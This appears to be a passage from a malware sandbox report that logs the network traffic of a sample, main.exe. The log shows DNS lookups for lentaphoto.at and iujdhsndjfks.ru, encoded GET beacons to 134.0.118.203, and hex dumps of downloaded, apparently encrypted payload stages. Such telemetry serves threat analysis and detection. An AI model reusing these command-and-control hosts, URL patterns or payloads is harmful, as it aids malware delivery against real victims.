                          Nov 16, 2022 02:14:47.930777073 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930783033 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930800915 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930810928 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930825949 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930831909 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930846930 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930900097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930900097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930900097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:48.026104927 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:48.087292910 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:54.114087105 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:54.114119053 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:54.114183903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:54.114183903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:56.108963966 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:56.109076023 CET4969880192.168.2.3134.0.118.203

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 16, 2022 02:13:04.754086018 CET5986953192.168.2.38.8.8.8
                          Nov 16, 2022 02:13:05.118052006 CET53598698.8.8.8192.168.2.3
                          Nov 16, 2022 02:14:25.358735085 CET5784053192.168.2.38.8.8.8
                          Nov 16, 2022 02:14:25.378199100 CET53578408.8.8.8192.168.2.3
                          Nov 16, 2022 02:15:18.869553089 CET5799053192.168.2.38.8.8.8
                          Nov 16, 2022 02:15:19.235027075 CET53579908.8.8.8192.168.2.3

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 16, 2022 02:13:04.754086018 CET192.168.2.38.8.8.80xbfdfStandard query (0)lentaphoto.atA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:14:25.358735085 CET192.168.2.38.8.8.80x8f7Standard query (0)iujdhsndjfks.ruA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:15:18.869553089 CET192.168.2.38.8.8.80xe6a8Standard query (0)lentaphoto.atA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 16, 2022 02:13:05.118052006 CET8.8.8.8192.168.2.30xbfdfServer failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:14:25.378199100 CET8.8.8.8192.168.2.30x8f7No error (0)iujdhsndjfks.ru134.0.118.203A (IP address)IN (0x0001)false
                          Nov 16, 2022 02:15:19.235027075 CET8.8.8.8192.168.2.30xe6a8Server failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • iujdhsndjfks.ru

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.349698134.0.118.20380C:\Users\user\Desktop\main.exe
                          TimestampkBytes transferredDirectionData
                          Nov 16, 2022 02:14:25.458513021 CET156OUTGET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: iujdhsndjfks.ru
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 16, 2022 02:14:39.472409964 CET158INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 16 Nov 2022 01:14:39 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 181406
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="6374397e8fb85.bin"
                          Data Raw: 77 e2 dd be 4e fc 54 af ad 72 f5 2f ec 9d cb 53 d6 b7 91 61 54 04 6d cf e9 2c aa c0 e7 9f 82 95 6b 8d d4 22 6c 13 aa 68 18 d0 aa b5 10 c1 a2 41 89 f1 a3 42 ef bf 79 a0 bc 8b 6f 7f ed 39 a7 e0 66 2c 52 2e d9 55 7e fa 1d bb 4f 2b 4a f1 c2 30 3d 4d f4 51 a2 63 bc 7b 18 08 a5 5c 47 f7 1b 47 80 2b 4b 47 1a 0a 44 d3 4a 81 5b 71 6a 06 85 b1 0b 9f 6d 9a 9e d2 64 e3 c3 21 75 b0 4a 0a 24 e3 01 8a 53 48 65 bc 19 81 72 30 d0 b0 d3 31 0b 32 5f db 00 53 a5 b5 22 de 93 6d bf 7d ae 59 fe 4f 33 88 ab 41 a0 f7 aa 93 79 cd 8d 06 36 0a d9 c0 c1 9e 4d fd 7b 27 87 a0 88 66 1f b7 b1 ce 9f 27 26 0b f1 7c cf 20 57 75 16 32 6a 66 96 3a 08 9f ed a9 b8 12 17 e4 7d 7b b6 03 1c 94 24 90 51 5d 3c ca d2 22 74 7a b2 b7 0b c8 2a 3e 5b 1e ea 50 a0 dc e2 d3 62 5c 42 85 be b3 71 41 27 40 dd 30 c9 ab 99 53 db 5f a7 dc a8 d0 33 e4 40 42 44 0b cf de 56 2b 8b f2 5a be 04 d0 d9 a2 e3 1a 76 c5 d1 12 82 97 85 a0 7a 30 39 0d 41 28 6e 42 1c a1 3a 15 dd 27 99 ce c7 c7 55 bb e4 a3 41 0c 3e 7e e0 36 64 ed 00 c9 c7 93 66 3d 50 2b 25 6a 06 56 6d 0f ed f2 30 6c e6 52 39 ee 18 b7 06 56 8e c5 61 2d b7 ca 56 d2 ba ea 3c fc c1 d7 77 5f ad be a6 63 71 e3 81 5a 9b 3e 29 d5 b6 2e 51 d3 29 c2 2b f2 6d da 38 bf 5c 5f 60 e7 0f 62 9f 89 ad fe 48 69 d8 af 97 ab 36 a0 4c 65 1a 5e 22 bf d7 b5 51 a4 da 1c 65 56 98 4b 42 67 3f af d2 c9 09 e8 c4 23 51 86 cd ca b9 ce 6a fa d9 69 e7 a7 28 d6 4b 57 4c af 9d ad 7a f6 23 fd 21 c0 45 58 e6 c7 1d bd 4c 6e 99 33 e5 4e 70 3f c3 0a c1 f7 bc 08 31 2a 0c 6c 59 d5 f1 22 bc 21 25 4d 1b 31 21 88 eb c3 05 05 1f 9d 43 1b ff 04 61 4f 05 d8 ef b3 48 9a 26 fa a7 6a f1 38 b4 0e 17 3b 21 80 6f 25 e6 1e 00 26 a4 86 97 87 8b 4f 49 30 9e 7f 8e 8b b8 25 ca 27 3d 45 3f 7b 6c 95 7d a3 89 0a 46 5f 78 b3 ef 84 5b 22 42 fe 07 84 b3 7e 10 99 de c0 96 85 eb 52 63 2b e6 b5 7e ec 54 cc d6 ee e0 e3 98 c4 a7 67 8a 4d 35 0a 7e bf 95 86 61 d0 ff 93 63 82 33 30 d2 ad 2b 70 8f f2 df b1 aa a3 31 d6 83 c1 f1 f4 2b 27 58 52 89 e3 a1 39 54 3c 37 6d dd db 01 f9 5d c1 26 f4 8a a4 1e c6 3b e3 69 98 d5 47 1c 64 1a 87 e0 a9 42 bc f1 67 25 3b e4 c8 17 35 ba f6 2f 3f 43 ab 99 51 f9 c9 ca a7 a8 3d 1b 69 3f 7c f4 93 2c 6c 28 f0 ab d5 d3 6a 03 90 8a c4 b7 39 82 35 14 67 56 36 08 3c f9 ca 7b ae e5 83 bf d8 cc f9 56 2c 1f 9d 08 e2 5f 30 c9 d5 a8 42 b5 3b a9 15 49 05 80 d0 97 e6 3c 34 ff 5a 4c 72 9a d9 33 98 f5 7a 7c 34 e2 41 e1 f4 a5 9c cc 39 18 14 32 3b 21 8c 5e 8f 77 15 91 fd 56 d1 d8 57 89 ee 9c 7c cd ee 4f 9e c1 10 8c 6c a4 34 7a 76 0e 75 e1 b5 2e 77 c0 3c 6c 8f 6b 00 88 3d 2d c3 1d bd 6d 47 50 14 ba e2 4e 01 f0 9d 46 dd d0 a7 06 fa 29 ca d1 a1 46 a4 67 fc 57 c7 33 2c 6f 83 79 38 61 94 ea ad 5a 68 e3 66 39 a7 55 e3 ef 1e 9e e4 c6 f6 5d 19 2a 73 8b 26 98 e8 5c 0b d0 34 15 30 15 a1 0e 91 43 ae c8 d2 f8 91 b9 33 23 a0 13 85 a7 b1 93 91 f1 1e b8 7d be 44 2f 78 78 ef 16 74 e9 d9 9d c4 bd 54 36 9b 1c e5 21 3e 49 a3 e8 9a 20 03 10 46 47 85 2e ad 3a 57 6a
                          Data Ascii: wNTr/SaTm,k"lhAByo9f,R.U~O+J0=MQc{\GG+KGDJ[qjmd!uJ$SHer012_S"m}YO3Ay6M{'f'&| Wu2jf:}{$Q]<"tz*>[Pb\BqA'@0S_3@BDV+Zvz09A(nB:'UA>~6df=P+%jVm0lR9Va-V<w_cqZ>).Q)+m8\_`bHi6Le^"QeVKBg?#Qji(KWLz#!EXLn3Np?1*lY"!%M1!CaOH&j8;!o%&OI0%'=E?{l}F_x["B~Rc+~TgM5~ac30+p1+'XR9T<7m]&;iGdBg%;5/?CQ=i?|,l(j95gV6<{V,_0B;I<4ZLr3z|4A92;!^wVW|Ol4zvu.w<lk=-mGPNF)FgW3,oy8aZhf9U]*s&\40C3#}D/xxtT6!>I FG.:Wj
                          Nov 16, 2022 02:14:39.472446918 CET159INData Raw: 9b 36 7c 80 e7 7c 25 f3 bd ba ea 85 23 ff 30 03 f9 4b 8a 0b ab b0 b3 32 21 23 e6 6c 7b 9d cb 81 f1 58 10 a9 75 2f 32 e4 8a 32 f5 fb a2 65 b7 06 a4 68 c6 a9 51 2a 7b 47 b9 5c c5 ab fe 55 8f 6f 1e 62 06 a7 43 d6 43 54 e5 ce 97 00 6a b5 8d 83 94 03
                          Data Ascii: 6||%#0K2!#l{Xu/22ehQ*{G\UobCCTjU><(:aR9[aX1hf1}Qwn;f tGu@uwb45jgVR#;^ok$C7Xozic9Xa-t!ZC?
                          Nov 16, 2022 02:14:39.472465038 CET160INData Raw: e7 00 33 c7 32 f9 29 da e4 77 5b a8 0d d2 d5 50 83 d6 5b 6b 81 d5 ba dc 84 8f a3 80 14 47 7e 5c af 41 61 0f 16 41 24 46 b8 0f 45 7f 2f 19 7f ff 36 48 73 5e 40 e3 97 97 36 a7 aa ba ec 89 db 14 8e f1 dd 49 d2 f1 92 5e d2 d8 28 8a e8 f5 88 62 d9 34
                          Data Ascii: 32)w[P[kG~\AaA$FE/6Hs^@6I^(b4+8j6I>h7K C!sCN4|`.snD!ZXzx4 ;8Q6B0Q|J~Wec;x\|7RSl^;9>s]]FFZ"
                          Nov 16, 2022 02:14:39.472477913 CET161INData Raw: 22 db c3 ab c3 e7 2e b5 47 36 19 ad f3 4a 13 2c bc 20 43 aa ab b4 79 1b 38 1d ee d7 ff be 1f b4 8b c2 ac d3 ff 6d 16 f7 f8 b1 b9 c9 4b 1e 6e f3 c3 ff 5f ef 0c 0b 16 4c 0b a3 36 cf af 35 0b ec 80 e4 3d 1f 14 70 ef 0f 28 14 4b 69 25 df 48 4c 81 f4
                          Data Ascii: ".G6J, Cy8mKn_L65=p(Ki%HL(9pkd*n|pAc9"uyIJ_gf<!\v>z9'&8ejl92#-_s1T.Oz@qz?r)&ykfLM9~kCb@!
                          Nov 16, 2022 02:14:39.472493887 CET163INData Raw: 7b 9a c2 b6 11 5b ae e6 8a 39 96 83 b7 5f 6a cd 96 1a 58 e4 61 fd b8 4f d5 67 2d 95 e7 2d 5f 5a 30 c6 11 f5 92 3c 76 f2 0a ad 63 bc c9 14 18 63 f3 72 cd 2b 9c 05 41 0d 18 a3 c6 bb 0e 73 2a 26 73 75 42 51 c3 41 2d 63 95 d2 1e d6 c0 32 5f 69 72 57
                          Data Ascii: {[9_jXaOg--_Z0<vccr+As*&suBQA-c2_irWw$HH\"4xzdz{Te}}40#Sm-vUt8lB4.TF0XgZzqCp|KeHjd*l!PK;_h{%
                          Nov 16, 2022 02:14:39.472511053 CET164INData Raw: cc 76 bb cd f7 fc 0e 53 26 e7 74 81 bd 1f c0 85 78 8a 00 cc 05 de 1a 92 19 2e 6e d3 b7 ef 8d e7 51 00 7a c7 8f e4 46 08 07 6d 06 e2 0f 6b 8c 5a 51 2c 5e ea a2 84 b8 21 80 1c 41 ad d3 09 d4 24 f0 0f 70 1c df 2a a6 0d 94 de bd 88 cd 73 83 7c eb a5
                          Data Ascii: vS&tx.nQzFmkZQ,^!A$p*s|sG&eYW"E|)kvCC30etIM(6[&-f:aJ1~l)yM<416,X_p-c>,f:{5+Z:
                          Nov 16, 2022 02:14:39.472527027 CET165INData Raw: d4 d4 e1 3e 46 7e 10 1e 3c 78 7f b6 31 53 b2 12 e7 27 17 af 3c ea 5f 21 97 a6 d0 21 2d 48 09 98 b6 be 1c af 44 0f 61 d9 1b 40 8a 53 9b 78 7d 73 82 9f 0c a2 86 d7 6d 64 cb c9 57 81 75 ce e8 ad ae 7f 77 26 f3 07 74 72 7e 0a 62 a3 26 10 d7 a3 88 59
                          Data Ascii: >F~<x1S'<_!!-HDa@Sx}smdWuw&tr~b&YI3"g/UISX4-!p@JtMsh9;*mHO6]:rs-E*'Vm2C1(`)!rtCm."V#G4kThBNIOk~X6mJ=
                          Nov 16, 2022 02:14:39.472544909 CET166INData Raw: 67 c5 86 52 e6 25 00 28 89 76 b7 40 78 bd 4f ad 25 98 75 8f c0 e6 18 70 fc 86 60 0b 0d d7 95 6f 07 4b 32 36 36 0f 10 3e 28 79 b4 d5 8c 81 99 63 73 33 ec a8 d0 13 af e7 e3 4d 6e 4a 73 2d d3 45 f1 53 02 67 0a 01 e6 2c 79 5c 81 6f 70 48 6c 5a 34 9b
                          Data Ascii: gR%(v@xO%up`oK266>(ycs3MnJs-ESg,y\opHlZ4ffoYMD**[nz*ED].Hb[V?!eKbX5prlY'.)1V!0mzYksLYm=\*jp#mYq5yt<@U
                          Nov 16, 2022 02:14:39.472562075 CET167INData Raw: 1f 20 31 0d b9 9c 5e f7 fc 88 99 58 2b 8b 42 9d 17 2e 18 b0 f7 e1 f6 d4 de e8 c1 17 a2 6e 37 3f d1 e8 a6 43 83 09 4e d2 74 05 bf a0 e0 34 3e 5e ae 5b 74 b1 37 5d 09 85 15 57 54 a8 bf 82 a4 7a 91 01 89 17 11 75 80 db ad dc 1a 93 76 c4 c6 1c ec c4
                          Data Ascii: 1^X+B.n7?CNt4>^[t7]WTzuvqtHzIwzZ{1\WDS7{cTF/b&zg,`0ClNE *'!HO)?I2-h:1^E8';Fz
                          Nov 16, 2022 02:14:39.472578049 CET169INData Raw: fd 8b 10 c0 e6 b7 90 52 11 10 23 b0 1b 85 73 bd 50 42 cd 92 2a de f1 9e 92 07 60 11 a7 68 1e a6 9a 17 e7 8c 5c 83 45 7f 0f 2c 49 46 0e d6 7a 17 96 ca 69 a8 8a 05 c7 54 45 1a c5 d3 7d 97 0a f0 59 3b 57 16 4c 96 9f b1 2f 72 e6 51 56 97 1e e9 4a c1
                          Data Ascii: R#sPB*`h\E,IFziTE}Y;WL/rQVJofuW<_wez.8(a>mhYMEk;#prdp@vn@E~;Tj1?uz{XF8*?=QlJ.\R!j=6k
                          Nov 16, 2022 02:14:39.533454895 CET170INData Raw: 36 5f c6 56 9d bc d8 76 d6 0d 2e 99 a8 3f 30 a7 4f 27 a1 03 f1 6c cb 8f 62 a5 e4 e6 c8 d3 26 dc 2d 58 5b 13 28 4f 75 8f b2 42 10 eb f4 08 c9 1f 4b c3 00 33 ce f2 cc f9 78 49 ff 2f d9 61 35 4a 86 94 7a ec ff f7 de 46 ed 0c fc 92 5b b1 df 62 83 b5
                          Data Ascii: 6_Vv.?0O'lb&-X[(OuBK3xI/a5JzF[bcyMe108p~M^+f9J%}#~u/[l\pwM<Q,:hQF(1sAvs5zXl8$p,WD-n+wLVcQ%XDr
                          Nov 16, 2022 02:14:39.786031008 CET345OUTGET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: iujdhsndjfks.ru
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 16, 2022 02:14:47.679074049 CET347INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 16 Nov 2022 01:14:47 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 233114
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="637439879f494.bin"
                          Data Raw: e3 6b 6d e3 37 df 41 63 38 18 65 c9 8b fd 3b b3 78 43 58 36 36 f9 73 97 97 df 5f 2f 22 36 78 29 ef b8 87 45 fd c7 9a d2 4e db 6d 5e 6d c1 7a b0 81 f5 74 5a f8 f3 8a 27 14 34 6d a1 52 7d 98 8d a1 57 22 89 98 58 d7 49 02 11 00 21 bc 66 34 31 75 ba 9d 42 ed 76 d1 03 fa af 5c 72 bb 0a 39 d2 89 9c fd 09 1c 62 8b b0 ab 1c 75 1a 76 20 a3 dd bc f3 a4 c4 ab f6 13 8d f9 06 9c 99 f4 c2 c0 96 24 0c e7 ff 6e 51 31 2c 7c 3f 30 4e 6d ae 3a 81 b7 f9 2a 40 3f be e9 9d 7c a8 ed fc f1 03 86 07 7f 75 4d 52 65 f0 58 47 93 18 03 5d ee ca bc ff c1 c2 63 ec 85 5c cd 2b a1 67 3f f0 02 bc d9 17 77 ef d9 9e d2 9a 18 a0 fd 35 6f e4 93 22 90 5d 3b 4b cb 71 86 70 d6 18 bc 62 28 aa 76 7a 24 52 c0 50 8c 3f 67 00 47 e3 df 79 ba 8e 68 84 d5 66 c4 d9 e0 01 2f cd b7 47 f6 43 78 60 ea f7 63 af 5f 7d 43 b5 d3 a3 19 01 d3 0e 00 9f d5 cd 32 6a 92 c7 e9 f1 6d a7 4f 7b cf 61 a9 0b 67 aa 2f c4 7d 9b 87 42 1f 06 02 50 31 ed ed 5f 9b c1 7c 78 39 c7 ae 0f 60 28 5d a2 bc d0 0a 1c 11 cd bd 67 c2 10 b9 0a bd 2b bc 1b b3 af d6 65 4f c7 39 cc 99 2d 8b c7 13 0b 23 68 01 b7 6d 11 6d 5f 45 8c 50 ca f2 cb 1a 76 80 e5 2a 68 28 74 1f c4 1a 6c 6a 57 79 d3 19 55 3f ed 6b fd 04 27 55 be a5 b9 f3 26 31 bc db 2c d9 ec f4 b6 cf ea 65 1d 39 03 8e 28 33 be c6 76 e5 3d 27 94 66 21 a4 06 e5 38 44 7a a6 15 e1 93 52 a0 b6 52 48 68 36 c3 ea f0 67 e2 e5 df b5 9d 56 9d 32 26 3a 44 2a b5 4f ae 18 e1 0c e8 1d f6 78 56 e4 8c 46 2f 04 20 3a d7 83 2d cf e5 67 1d e4 30 83 4c 09 28 f6 4d c9 78 fe 7c 68 ac 2b 01 df 7a 54 98 95 df 00 53 5b 05 b3 46 91 e0 fd fd 33 d3 3f a0 e3 87 8b 6d 09 a7 67 d2 4e 63 e4 eb 0b 8e 0e 5f 8f ec 35 c5 28 de 7d c8 4f 70 29 3e 0b ef 08 f7 98 76 6b e5 98 34 07 9e 30 f0 17 1f 84 ed 92 05 c8 5d 7f 07 67 41 5f fd e7 7b a4 a1 82 1f c7 48 3b 7a d2 e5 b8 03 60 9d 11 53 16 b0 23 99 5c 60 d4 0c 25 41 7d 53 2b d6 b8 e9 29 45 b7 e1 40 04 c2 63 5f 25 bf 50 66 a5 86 49 29 75 fc c9 41 e7 41 dd 11 e4 34 db a0 d8 f2 69 30 20 e8 06 11 4b be a2 ed f3 4e 2c ed 1e 2c cb d4 a1 4f a8 94 ef d7 7e 89 0e 5a c3 4f e6 3a 21 ee fc 45 cc 1c b1 66 ff be 26 c1 a3 e5 5c ce 8b 6c 2d e5 4a 2d 86 db 8b cb a6 0c a3 58 3c 3d 29 e9 01 d3 f2 8d 5b 20 b2 01 73 3f ba af 2a 84 ba 6f ee 3d f5 01 18 e0 9d f0 2d d4 9a 27 42 81 e0 81 8b 9d eb d1 3d cc ee 5c 9c 69 10 13 72 05 ce 41 f1 07 2a ca 77 d4 ce dd 07 d8 8b 2b 6d 08 31 6d ba 45 ce 26 57 5c da c1 2c f0 4b ff 6f 14 de f8 c7 76 a5 b7 c3 65 a0 49 7e bb ee 7b 35 5b b7 57 95 d8 a5 f2 e4 95 53 6c 3c b0 6d 36 bc d5 3a 9f 26 4f 6c 60 a0 4e 91 01 48 c2 37 46 83 25 2e 8f ad 3e 48 85 d9 66 03 e6 6a bd 12 4a c1 08 01 e5 c6 09 76 a4 31 72 f8 02 9b c2 d1 ea 27 c1 b2 8c d1 00 74 5f 25 ba 0d 26 6a 3c 3a e9 57 0e 9e 5c 3b 95 7a 3f d7 01 4e 59 b9 e7 e4 46 45 8f 57 57 6c a8 b8 ec 78 04 ce f4 bf 03 18 2c c9 47 39 f5 e2 92 88 ea 68 30 44 e1 f5 b1 b2 84 23 c2 f7 a3 62 69 be 6d 1e fd 55 8f e5 de 23 87 ee 7d 0a 24 4a 54 7d 7b b2 50 66 3c 2b 1c
                          Data Ascii: km7Ac8e;xCX66s_/"6x)ENm^mztZ'4mR}W"XI!f41uBv\r9buv $nQ1,|?0Nm:*@?|uMReXG]c\+g?w5o"];Kqpb(vz$RP?gGyhf/GCx`c_}C2jmO{ag/}BP1_|x9`(]g+eO9-#hmm_EPv*h(tljWyU?k'U&1,e9(3v='f!8DzRRHh6gV2&:D*OxVF/ :-g0L(Mx|h+zTS[F3?mgNc_5(}Op)>vk40]gA_{H;z`S#\`%A}S+)E@c_%PfI)uAA4i0 KN,,O~ZO:!Ef&\l-J-X<=)[ s?*o=-'B=\irA*w+m1mE&W\,KoveI~{5[WSl<m6:&Ol`NH7F%.>HfjJv1r't_%&j<:W\;z?NYFEWWlx,G9h0D#bimU#}$JT}{Pf<+
                          Nov 16, 2022 02:14:48.026104927 CET594OUTGET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: iujdhsndjfks.ru
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 16, 2022 02:14:54.114087105 CET596INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 16 Nov 2022 01:14:54 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 1973
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="6374398d83c18.bin"
                          Data Raw: 80 2c a2 22 7d 34 b8 1c 56 32 94 88 9e 7c 06 98 70 e9 d9 df 7a b6 89 64 cb 27 a8 dd 50 c3 e5 56 bc ca b6 e2 5e 03 07 03 49 38 9e e2 df 3f d0 31 c2 ac 5c ad d1 75 53 1f 38 1a 20 f5 98 32 a2 22 73 4d ee 46 aa e3 27 10 8a 01 67 52 37 2c bd 16 46 e7 dc d9 f6 ab 81 a8 0a 0b 8c fb 8f 47 02 5d 9a 22 db eb 07 00 8e 0d 34 5a 7a 25 d3 0e f6 80 87 5c 5d 20 c0 45 e0 2a 3c fb 7d 16 22 49 95 46 c4 bb 4d 10 93 85 07 69 30 0b 49 67 91 b5 3f 47 86 db 16 4c 64 05 01 9f 8b 1a 3d b4 3d f1 57 0d e7 14 cc be 04 b0 53 a3 39 5f 42 f2 cb 5a 30 04 a7 00 15 76 15 66 e2 fa b9 01 c5 b2 74 a7 dc 4d b4 ed dd ff 60 e7 b3 60 fb ae 40 94 9f 83 12 44 18 38 c9 a1 39 f0 3c 6c e9 e3 57 de 9e 32 c4 95 14 34 25 cb a2 3c 09 c5 d4 ca 2f 2a b0 50 f5 53 db ba 23 61 23 04 4d 43 d2 f8 2c 0d 4e cd c4 bd 92 63 32 e0 60 44 87 80 65 d7 e6 80 2a 4b 58 5e c8 fd 05 8b 4e 73 ab e6 c5 00 ea 2d 62 e3 fa ca d9 c2 2e 0b 98 e7 21 66 a5 bc d1 f5 06 2e d1 41 7d 1d fc 5f 95 55 2b a6 28 fe 90 2d ce 48 77 82 e9 10 1d 7a 14 52 bc df 71 f9 05 9f be fe a9 05 0b 0b d8 73 8c 38 c3 25 31 32 ea 23 da 91 a0 1c 93 bb fb af 3b d8 d3 a7 22 bf 3a 3e 45 69 83 51 63 ff 4f 6c 90 63 16 ee 19 25 47 2a 31 1a 4f 28 d3 75 8a 35 40 a2 e9 30 78 d5 7c 2e f5 83 ec 0b eb da c5 63 01 b2 82 d7 88 73 81 50 bb 8f 99 0f f7 14 3a 3d 4c 76 b3 a6 ae 92 03 7e 58 96 93 09 74 2b d3 14 7b 49 1b 34 de 7d 5d f6 2d 39 9f 3f 57 ea 6d d9 65 54 60 b6 2a b1 fa 6a c2 3f fb 07 f0 31 bf c0 38 5b 0c 32 e3 b1 68 db 73 75 7e 67 70 f4 c5 9b 84 2e 4e 96 13 a9 2e 08 66 de 84 1e 40 cf b3 3e aa 11 04 b4 ea d2 fd 85 3f 81 e9 c9 f7 43 d8 11 03 3a ce f4 9f ff 0b 8c 01 cc dc d4 eb eb a7 72 98 c6 24 7c 3d f1 0f e9 87 46 b3 75 3a d5 b4 33 32 49 4e 79 a2 ca f7 88 b2 54 df b0 0d 92 36 16 16 dd 53 5f 4e 22 0a 91 1b e7 06 31 3d 01 11 58 8e 4b 2b 07 f0 ec a0 4f cd f0 67 c2 6c 6f 2a 62 3e 9e 94 36 a4 fe 9a 75 bb 2e eb e3 87 6d 89 df b2 4e 70 76 90 8c b8 04 da a0 75 a2 4b 51 0f 35 bd c9 93 0d 6e 28 78 3b 1c 16 3e d0 c4 af 0d 22 2c 77 dd 2f 88 c6 33 b0 fe 47 15 ad 2f 0e 53 62 b3 29 a4 d6 a3 43 73 70 c7 98 65 2e c3 f6 1d 1b 38 16 42 c1 25 70 6f 6b b5 ef e0 ac c5 af bf f8 ec 81 36 ce 61 cd 03 42 e2 63 ee 1f 57 7b 11 10 14 4b af 45 b6 97 57 45 c5 61 e2 c1 df 75 dc 09 bb 72 b9 4e a0 0b 3b 1f 71 74 6a dd 1f 82 1c c7 1a e3 dd 27 2e 5e 6a a1 ba 6a 87 d1 f5 a9 37 d8 7a 15 66 77 68 f7 a7 6e 1a f2 bd 81 d7 98 73 41 33 0a e2 11 fe b9 78 36 5f 26 62 e7 73 fd b7 94 f8 69 8a a6 86 2e c7 1a 79 ac 11 64 31 38 0c 66 1f c4 f3 ad 17 26 d7 5d c9 69 64 66 f7 47 c0 59 72 5a c4 da c4 3e b7 f7 1e ed 72 87 d2 23 fa d5 3f b7 5d 65 b1 b4 c2 62 7b dc 7d 80 e5 ca 48 7c 4e ac 6d 69 6d 01 20 5f 0d fc 75 39 7c 93 11 62 a6 51 ae 37 90 bf 89 1e 5f 55 86 25 14 cc eb 38 5f 6e 7d b3 6e 60 3b 60 2e 7a 0f 98 4b 22 34 51 31 1f d9 0d 79 15 52 48 f8 34 e6 44 90 e7 c2 70 fd ab 81 00 aa 51 a8 90 93 65 06 70 da c3 95 6c 21 56 05 92 33 0c ab 48 ac cd 06 33 ce
